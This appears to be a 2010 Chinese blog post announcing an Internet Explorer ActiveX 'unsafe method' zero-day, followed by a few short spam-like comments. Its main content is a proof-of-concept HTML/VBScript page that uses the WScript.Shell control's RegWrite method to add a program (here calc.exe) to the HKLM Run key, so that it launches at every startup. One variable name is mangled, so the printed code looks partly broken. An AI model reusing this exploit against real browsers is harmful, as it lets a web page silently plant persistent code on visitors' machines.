传说中的IE最新0DAY(IE的ActiveX远程执行代码2(不安全的方法))
2010年01月19日 |
这个代码会写入启动项,各位看官测试的时候注意了,不会当时生效,重启后可见效果!
测试代码:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
</code><strong></strong><html> <object classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B' id='target' ></object> <script language='vbscript'> targetFile = "c:\WINDOWS\system32\wshom.ocx" prototype = "Sub RegWrite ( ByVal Name As String , ByRef Value As Variant , [ ByRef Type As Variant ] )" memberName = "RegWrite" progid = "IWshRuntimeLibrary.IWshShell_Class" argCount = 3 D3V!L FUCKER="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" germaya_x="C:\WINDOWS\system32\calc.exe" his0k4="REG_SZ" target.RegWrite D3V!L FUCKER ,germaya_x ,his0k4 </script> |
регистрация фирм
Где увидеть ссылку на RSS, а то не могу найти?
坏人咖啡
Вы можете найти ссылки RSS feed.huairen.me
gaoav
路过捧场
HTC
Наконец-то хороший пост в вашем блоге. Сорри 🙂
坏人咖啡
🙂